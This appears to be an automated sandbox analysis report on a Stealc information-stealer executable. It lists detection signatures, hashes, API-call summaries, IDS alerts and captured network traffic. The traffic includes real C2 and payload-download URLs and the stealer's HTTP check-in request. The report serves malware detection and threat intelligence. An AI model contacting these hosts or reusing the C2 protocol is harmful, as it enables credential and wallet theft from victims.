Windows Analysis Report
M13W1o3scc.exe

Overview

General Information

Sample name:	M13W1o3scc.exe renamed because original name is a hash value
Original sample name:	e6dd6a25125edd4c21fe5cf7bafcd2bb.exe
Analysis ID:	1528594
MD5:	e6dd6a25125edd4c21fe5cf7bafcd2bb
SHA1:	c1b1ec6b5e78fcaff4290bff55ae86ee8816f715
SHA256:	523cd90154c376b7f6953f1e825eb467b231b3fffe30ab321c1a69da22cb1148
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found evasive API chain (may stop execution after checking locale)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1310247

Found malware configuration

Source: 00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}

Multi AV Scanner detection for domain / URL

Source: http://62.204.41.151/ScreenUpdateSync.exe	Virustotal: Detection: 19%	Perma Link
Source: http://62.204.41.150/ows	Virustotal: Detection: 6%	Perma Link
Source: http://62.204.41.150	Virustotal: Detection: 9%	Perma Link
Source: http://62.204.41.151/ScreenUpdateSync.exegyaCannot	Virustotal: Detection: 17%	Perma Link
Source: http://62.204.41.150/edd20096ecef326d.php	Virustotal: Detection: 12%	Perma Link
Source: http://62.204.41.150/	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Virustotal: Detection: 37%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Virustotal: Detection: 37%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for submitted file

Source: M13W1o3scc.exe

Virustotal: Detection: 11%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,	16_2_0040C820
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	16_2_00407240
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	16_2_00409AC0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	16_2_00418EA0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	16_2_00409B60
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022ACA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	16_2_022ACA87
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	16_2_022A74A7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	16_2_022A9D27
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	16_2_022B9107
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	16_2_022A9DC7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Unpacked PE file: 16.2.478F.tmp.exe.400000.1.unpack

Uses 32bit PE files

Source: M13W1o3scc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:60060 version: TLS 1.2

Source: M13W1o3scc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00114005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00114005
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BE26E Process32NextW,SetFileTime,GetFileAttributesW,FindFirstFileW,__floor_pentium4,GetShortPathNameW,DeleteFileW,__floor_pentium4,	15_2_000BE26E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011C2FF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011494A GetFileAttributesW,FindFirstFileW,FindClose,	15_2_0011494A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD14 FindFirstFileW,FindClose,	15_2_0011CD14
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	15_2_0011CD9F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F5D8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F735
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011FA36
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00113CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00113CE2
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	16_2_00414570
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_00414910
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	16_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_022AE697
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_022B3B17
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022B4B77
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_022AEF87
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	16_2_022B47D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AE077
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_022ADCE7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_022AC0D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022A1937
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	16_2_022B4107
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AF917

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:60062 -> 62.204.41.150:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://62.204.41.150/edd20096ecef326d.php

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 08 Oct 2024 01:52:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 08 Oct 2024 01:45:01 GMTETag: "6ee00-623ed4925df50"Accept-Ranges: bytesContent-Length: 454144Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fb 69 6f f7 bf 08 01 a4 bf 08 01 a4 bf 08 01 a4 d0 7e 9f a4 a7 08 01 a4 d0 7e aa a4 98 08 01 a4 d0 7e ab a4 d3 08 01 a4 b6 70 92 a4 b4 08 01 a4 bf 08 00 a4 33 08 01 a4 d0 7e ae a4 be 08 01 a4 d0 7e 9b a4 be 08 01 a4 d0 7e 9c a4 be 08 01 a4 52 69 63 68 bf 08 01 a4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 23 a0 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 d6 00 00 00 f4 06 00 00 00 00 00 f9 3b 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 a5 ff 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 9b 04 00 78 00 00 00 00 00 06 00 08 f1 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 9b 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 90 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 fc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd d4 00 00 00 10 00 00 00 d6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d2 b6 03 00 00 f0 00 00 00 b8 03 00 00 da 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 1c 01 00 00 b0 04 00 00 60 00 00 00 92 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 6f 7a 69 7a 75 64 00 04 00 00 00 d0 05 00 00 04 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 61 78 75 70 00 00 d6 00 00 00 00 e0 05 00 00 02 00 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6d 61 77 65 62 00 00 00 04 00 00 00 f0 05 00 00 04 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 01 20 00 00 00 06 00 00 f2 01 00 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 31 38 31 38 36 35 45 36 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="hwid"E3181865E6061437788654------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="build"default6_cap------JDBGHIIDAECBFIDHIIDG--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 62.204.41.150 62.204.41.150

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:60061 -> 176.113.115.37:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:60060 -> 172.67.179.207:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_001229BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

15_2_001229BA

